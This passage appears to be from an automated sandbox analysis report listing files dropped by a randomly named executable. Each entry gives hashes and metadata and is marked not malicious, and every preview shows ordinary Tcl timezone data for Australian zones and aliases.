                                                                                                                                                                                                                              Size (bytes):759
                                                                                                                                                                                                                              Entropy (8bit):4.110997549215461
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862EmdHvOYCvV2mV22wF2nUV2CF2+V2pCwF21UF2biV2cHVKF25V2VF2cV2tFq:5Eemdvg2wQCKZ4j5c0LVmtH1iknohwQT
                                                                                                                                                                                                                              MD5:1BC8DBD2E24606EFA49F933034FC0EEF
                                                                                                                                                                                                                              SHA1:A511695A1B87A689C6BFF65257C11D3962FDDA3D
                                                                                                                                                                                                                              SHA-256:79D0C770A304360DB33F3D1EF7B3935F1E4E8125893E0DCE683AC35A51302CFB
                                                                                                                                                                                                                              SHA-512:A839D390D70F22FC833322029B732F3AE68FF48793B07005041BD12322DD6E5D5E5FF31787AA004A507A57F8FC245133891F266C4EF19D49F085E6B412E5B04C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Eucla) {.. {-9223372036854775808 30928 0 LMT}.. {-2337928528 31500 0 +0945}.. {-1672555500 35100 1 +0945}.. {-1665384300 31500 0 +0945}.. {-883637100 35100 1 +0945}.. {-876120300 31500 0 +0945}.. {-860395500 35100 1 +0945}.. {-844670700 31500 0 +0945}.. {-836473500 35100 0 +0945}.. {152039700 35100 1 +0945}.. {162926100 31500 0 +0945}.. {436295700 35100 1 +0945}.. {447182100 31500 0 +0945}.. {690311700 35100 1 +0945}.. {699383700 31500 0 +0945}.. {1165079700 35100 1 +0945}.. {1174756500 31500 0 +0945}.. {1193505300 35100 1 +0945}.. {1206810900 31500 0 +0945}.. {1224954900 35100 1 +0945}.. {1238260500 31500 0 +0945}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8734
                                                                                                                                                                                                                              Entropy (8bit):3.8515786470328823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aOqigkx6WsYyS39nQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:aOq05hnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:5E04BF8E1DEBFCC4130FDD1BBD67B2DF
                                                                                                                                                                                                                              SHA1:796AADCE7BB2FAF5E6FC916C941A4E3DCAFACC9E
                                                                                                                                                                                                                              SHA-256:D813F6A97BEFC22CA4F24C59EB755D269B9C68A449CC7CF0D2C61F911860EBE7
                                                                                                                                                                                                                              SHA-512:3A69CF1D1F57D6BD39E5F4DAF76BBB06A749D42BEB29452A0A5BDAA68F5DACC0DF176EDDA7A083F5B5B84FC651926C09D46CAAD2F6C4F1595AB9CCA1A958D653
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Hobart) {.. {-9223372036854775808 35356 0 LMT}.. {-2345795356 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-1646640000 39600 1 AEDT}.. {-1635753600 36000 0 AEST}.. {-1615190400 39600 1 AEDT}.. {-1604304000 36000 0 AEST}.. {-1583920800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AES
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.912882643701746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIoGEoPHAIgjGg6N/2DCkx/2DCPGUv:MByMjeXV6t2a8v
                                                                                                                                                                                                                              MD5:425DC7B1E31F4AA41DAD74E3C9AE3562
                                                                                                                                                                                                                              SHA1:D92A3269F7BF5EC00F082C64CEF6E20C43017180
                                                                                                                                                                                                                              SHA-256:4D84E4040FBC529C9E0366BB74D0CFADEEEEDA0DFCC6C2C9204DED6C6455CAC3
                                                                                                                                                                                                                              SHA-512:F3031F16C0D00D9F8A38CD378F599EB3E63F4FF85F120DB38E3013E93F08E6F512D969F164BBC88CD625910FB3E086F3352E5B8FFC1373C3CC98F363FB3FD3F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Lord_Howe)]} {.. LoadTimeZoneFile Australia/Lord_Howe..}..set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):824
                                                                                                                                                                                                                              Entropy (8bit):4.249672335529665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862gtmdHVCvCi0xT0ryRIvUr0obbty/ywtUj3yv:5gteMvCi6Xlt8
                                                                                                                                                                                                                              MD5:504A422280E0459A2126E7CB02F527E6
                                                                                                                                                                                                                              SHA1:EF61B98EFB1E44EE59020E99A69EA67D6B8ACFC2
                                                                                                                                                                                                                              SHA-256:01B278309353849CC2FDF62A30E2FF483833D5713CF5E329252738BE6F2C0A84
                                                                                                                                                                                                                              SHA-512:BFDAAD56D817CD3AAB17DFD0A33EFDD422645BC542ABE269C0F8520E33796DF4F19EAB2E40BFC6C4AF93EF654239B8F2E285639B4662040D865B9C340A23CFAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lindeman) {.. {-9223372036854775808 35756 0 LMT}.. {-2366790956 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}.. {709912800 36000 0 AEST}.. {719942400 39600 1 AEDT}.. {731433600 36000 0 AEST}.. {751996800 39600 1 AEDT}.. {762883200 36000 0 AEST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7764
                                                                                                                                                                                                                              Entropy (8bit):3.5615258807990537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pmz39IyKxb/JbcD9gKniAF23QbNS1fEGXALNbbT2JFJ/FaKaTQ9ZJhRVK:p+cpVKniAF2AbkFKL
                                                                                                                                                                                                                              MD5:10F983F4683CDE13A1228AC0B04D8513
                                                                                                                                                                                                                              SHA1:45378BA5949BE53D698108F50FECFF50C9E3D296
                                                                                                                                                                                                                              SHA-256:76D1F1ED67B8F8D6903789C2FDDF79590A83677972D416F5F3C9687614EC6238
                                                                                                                                                                                                                              SHA-512:D60D802EF215A33750E4F859657BA12A67084B1E9FCF1B4A7CEEE7B9D816BC2C6670775D93C88EC8380CDD7790AD574133D6F90F0828F848313C26583B2F196A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lord_Howe) {.. {-9223372036854775808 38180 0 LMT}.. {-2364114980 36000 0 AEST}.. {352216800 37800 0 +1030}.. {372785400 41400 1 +1030}.. {384273000 37800 0 +1030}.. {404839800 41400 1 +1030}.. {415722600 37800 0 +1030}.. {436289400 41400 1 +1030}.. {447172200 37800 0 +1030}.. {467739000 41400 1 +1030}.. {478621800 37800 0 +1030}.. {488984400 37800 0 +1030}.. {499188600 39600 1 +1030}.. {511282800 37800 0 +1030}.. {530033400 39600 1 +1030}.. {542732400 37800 0 +1030}.. {562087800 39600 1 +1030}.. {574786800 37800 0 +1030}.. {594142200 39600 1 +1030}.. {606236400 37800 0 +1030}.. {625591800 39600 1 +1030}.. {636476400 37800 0 +1030}.. {657041400 39600 1 +1030}.. {667926000 37800 0 +1030}.. {688491000 39600 1 +1030}.. {699375600 37800 0 +1030}.. {719940600 39600 1 +1030}.. {731430000 37800 0 +1030}.. {751995000 39600 1 +1030}.. {762
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8341
                                                                                                                                                                                                                              Entropy (8bit):3.8532171550973526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Yyigkp2EUyn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:Yy3VnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:40D06B80A4A0DB415270EFD9698B97BF
                                                                                                                                                                                                                              SHA1:1999F0E8C7EBAA11BD21D64D9E07FA911F13C64C
                                                                                                                                                                                                                              SHA-256:F21B9EA51C0D41BAD0420FE0601E5A4B491FB895856F4BDDF6541D704469D92F
                                                                                                                                                                                                                              SHA-512:E47D597CC85D177CF2804C44C216EB4C5B74472457F15F697704311A847BF8A051DCAFD26FA61DD689555F35640151E26F25D5DC5319EFEFEA62AD86657A4A95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Melbourne) {.. {-9223372036854775808 34792 0 LMT}.. {-2364111592 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.893713405897538
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjREeQWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DC5eDCyB
                                                                                                                                                                                                                              MD5:80B7CDD1EA5A5308CE84C038180005F2
                                                                                                                                                                                                                              SHA1:B7CA15B58ADA8CA3EB74B7971073022D57D8EE70
                                                                                                                                                                                                                              SHA-256:73D7C9E207E61ACF8DF7242BDCD84488189033E22A84873A953B65DE02FA1B0B
                                                                                                                                                                                                                              SHA-512:F627F5FF335600AC9158D6A0D3694AB7E70180177449C17B5605BBF7B1B7F8FB447A9C207F4E1BCB627074DB47B8A66F5D78E03C6DB8FA17F8BDD6AABB331665
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/NSW) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.830368875485429
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjbvvXHAIgoXjbBvRL/2QWCCjsrQWCCjbi:SlSWB9vsM3yIFHAIg2N/2DCZrDCl
                                                                                                                                                                                                                              MD5:14CB7EA1C028F457345EBEB8ADDC9237
                                                                                                                                                                                                                              SHA1:208BF676F56533BA271D1B98363A766DF17CF6F2
                                                                                                                                                                                                                              SHA-256:A983C9CAD7E542CAED43B083E68CD2B782959A4B54015F374C29250D3ACF9B8D
                                                                                                                                                                                                                              SHA-512:099F65E5FA705FD7257CF7B8E103905EE313C6D082844F69CCD3F318E3E7F4098B29F952FA0AA28655E1FE290A0FB2E809911088315889DE7CAAF0E04698C2FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Darwin)]} {.. LoadTimeZoneFile Australia/Darwin..}..set TZData(:Australia/North) $TZData(:Australia/Darwin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):739
                                                                                                                                                                                                                              Entropy (8bit):4.31793586514766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB8623mdHCBdCvmlXz6zezzOz4iaLYvzkzi4zm5fVcBhg8mfev:53eCB0v4+e3Oz4iaLYbkzi4zxhfqw
                                                                                                                                                                                                                              MD5:01B1A88867472AD60B8F5C0E1648E3ED
                                                                                                                                                                                                                              SHA1:9975EA750458E8061DD8A83585675CB7E4910CA6
                                                                                                                                                                                                                              SHA-256:FC1B54CA261074E47A8A486FEAC12DD04D46166D1D2B44163BD8791BEC32D275
                                                                                                                                                                                                                              SHA-512:20BDFBCD1A5038C81552EBD955F3921DE3447A1F30E64935937768B2B98735AE53049601DCDD2D519646C78E6D03289EB465CFF4F2DADEA7D89A329504C6C475
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Perth) {.. {-9223372036854775808 27804 0 LMT}.. {-2337925404 28800 0 AWST}.. {-1672552800 32400 1 AWDT}.. {-1665381600 28800 0 AWST}.. {-883634400 32400 1 AWDT}.. {-876117600 28800 0 AWST}.. {-860392800 32400 1 AWDT}.. {-844668000 28800 0 AWST}.. {-836470800 32400 0 AWST}.. {152042400 32400 1 AWDT}.. {162928800 28800 0 AWST}.. {436298400 32400 1 AWDT}.. {447184800 28800 0 AWST}.. {690314400 32400 1 AWDT}.. {699386400 28800 0 AWST}.. {1165082400 32400 1 AWDT}.. {1174759200 28800 0 AWST}.. {1193508000 32400 1 AWDT}.. {1206813600 28800 0 AWST}.. {1224957600 32400 1 AWDT}.. {1238263200 28800 0 AWST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):203
                                                                                                                                                                                                                              Entropy (8bit):4.803539644461131
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIaWhSHAIgPWAvN/2DCoRWJvFBx+DC7WN:MByMjL9t2rOvFel
                                                                                                                                                                                                                              MD5:401B6B2E30EF17BE20212645287EB94B
                                                                                                                                                                                                                              SHA1:67D15A45C61122CE680B829FE0FA3A1C501A8C8F
                                                                                                                                                                                                                              SHA-256:DDA669B9BFB3E08FC23CE67030148B9E4740824ADD8DE02580D6AFD31CE05BAB
                                                                                                                                                                                                                              SHA-512:F4348F8F4FF261C47854725AEE4E14E7E334B3C31496E5C46B0E0041551CB6861380E684E8888AFE9DA7E8E97236AC322B9CE2738EF245E9D46C9681665F83A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Brisbane)]} {.. LoadTimeZoneFile Australia/Brisbane..}..set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):198
                                                                                                                                                                                                                              Entropy (8bit):4.752918480727309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIDRpGSHAIgSRrN/2DCa7QDCuRpyn:MByMjdpQYrt23QHpy
                                                                                                                                                                                                                              MD5:D226A0718185854DFE549E00856AA8D5
                                                                                                                                                                                                                              SHA1:94EE96FAE259D90C2FDF169DD95BD82B3171FFAE
                                                                                                                                                                                                                              SHA-256:D9DCFDC377901EC0C0FEB9CEA743C2C1425273F69A1BAA7BF3B74FEC5885B267
                                                                                                                                                                                                                              SHA-512:7EE29A7235CAAEF4889246B7A2241CA9A0D5D2B2E1D56B20141247C93B8736F17280F0D46004AC4588E137D1E76F661C779C906BBFC2B5F8FA73C19F7657F952
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Adelaide)]} {.. LoadTimeZoneFile Australia/Adelaide..}..set TZData(:Australia/South) $TZData(:Australia/Adelaide)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8338
                                                                                                                                                                                                                              Entropy (8bit):3.847525715050911
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:AZJigk42/yn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:AZJuVnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:C0F1776E011C4C86B7709A592E7CA1EB
                                                                                                                                                                                                                              SHA1:1CA528D529BF4995E145D6E0D87A8752A3577E7F
                                                                                                                                                                                                                              SHA-256:FC453486325ADE1D31F14087B76D4936F3A6D551ABD1DB6FCAC129BDB043951C
                                                                                                                                                                                                                              SHA-512:F872182962C2615A35F012ECAB30C88F07C6BEF0261207AD52706DB22D8CDD0DA65723CD801FDA7C548C5EB0ECFC39DD66CC17503BAA3BBB77BFA35D20650E4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Sydney) {.. {-9223372036854775808 36292 0 LMT}.. {-2364113092 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.777331394201868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DC3neDCVDy:MByMjUQVv8At2+eKy
                                                                                                                                                                                                                              MD5:9C58D9EFBB03472BBDA76CE2FFAD4BB4
                                                                                                                                                                                                                              SHA1:30959E3681B64AE26F7FA3957887896C26AF7F19
                                                                                                                                                                                                                              SHA-256:C94FA7A7640CD00963EE8FF1A3D9DCDA2075408739D998EDBF7CFC998DB764FD
                                                                                                                                                                                                                              SHA-512:2D6B778217726691F2CB4A4995A8B1AB08DDB7FE4570A3FD04EF54F718F455EF3CBD4EEF1A1BCC99A2088C82A6E89DB455BAF1327CECD6BF608837E50F14A6C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.818875198673406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIvFfkSHAIgoFNNvN/2DCzyQDCMF4:MByMj9fKaNNvt2xQz4
                                                                                                                                                                                                                              MD5:0B144A2E47C81354BC510BC741DE5150
                                                                                                                                                                                                                              SHA1:A7396F1741F02C6C208FD1286362E4E0720198B8
                                                                                                                                                                                                                              SHA-256:DBEF9C5BDD290FEC5FA740D697143332D3CA1FC373CF1DF736F1883AC9BA3298
                                                                                                                                                                                                                              SHA-512:562B029591F9ADB8C324BA56E849B2B524E91B26D3DB441510194882A8E1E63E6948D041874A00A0A76F29925A1CEAC53DD2AE5D7F23123B6FE919346CBFD8CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Melbourne)]} {.. LoadTimeZoneFile Australia/Melbourne..}..set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.831654343064909
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjXFeyXHAIgoXjrWARL/2QWCCjH0QWCCjQ:SlSWB9vsM3yInHAIgOWAN/2DC00DCt
                                                                                                                                                                                                                              MD5:5F5916CB038876BE27AA5E2AD74EE085
                                                                                                                                                                                                                              SHA1:18AC21B638188B542455BA3DA91F958DF1724E68
                                                                                                                                                                                                                              SHA-256:75ABB7F20C4A0B618138AA190AF33CEAF2A6D2C707DA6C1314E4BFF2F9904F58
                                                                                                                                                                                                                              SHA-512:ADFD83E292AC1BB5E19255A9B2DA0E3BB9323A5F9B92D458DE34C291D7F9B6CFBBF62AA3351FB320E54F34305DD485ADC72134D21AFA6A27B2B8B7D93DCA2113
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Perth)]} {.. LoadTimeZoneFile Australia/Perth..}..set TZData(:Australia/West) $TZData(:Australia/Perth)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):212
                                                                                                                                                                                                                              Entropy (8bit):4.918079927018121
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIcKlHAIgJK3N/2DCkuM0DC9KM:MByMjcKeJK3t2kVSKM
                                                                                                                                                                                                                              MD5:BEDEA56FCE4B2F0A3F3E9319856A5560
                                                                                                                                                                                                                              SHA1:9FD0FE998A003C6B4CCCD00A977153347DE07F55
                                                                                                                                                                                                                              SHA-256:55A9264D0414644A1BE342106AE86086A6659596DC9322A74FC4D1DDB41F7C60
                                                                                                                                                                                                                              SHA-512:7C438B72262B99EDEEB31AC95E0135BB722A3B0B049278B6DE67DB5FB501837FB9C03785233B538E83F4B56104F6EA3B3DA0F7C2275E0F78F232161840AA4C63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Broken_Hill)]} {.. LoadTimeZoneFile Australia/Broken_Hill..}..set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.888429541699473
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/xWh490th4:MByMYdIp7tQ490I
                                                                                                                                                                                                                              MD5:A8A7A10DA4321819ED71F891480770F8
                                                                                                                                                                                                                              SHA1:930674EF7711542D7F471A59C1870D4576E027FD
                                                                                                                                                                                                                              SHA-256:2F594239A434052D36053A2B3EAB134EADBAD06EB6737E67CF72166DAB157537
                                                                                                                                                                                                                              SHA-512:C6AD1869A713DDE0E4DE53F7894E5CE0B7AEFDDD7C5C3D83BB5B92FB7D8E20B373A6694045053E1AE8EA98A7B7D0C052EF2C21310E47DC650A7A399A5F73D586
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.875339623736144
                                                                                                                                                                                                                              Encrypted:false
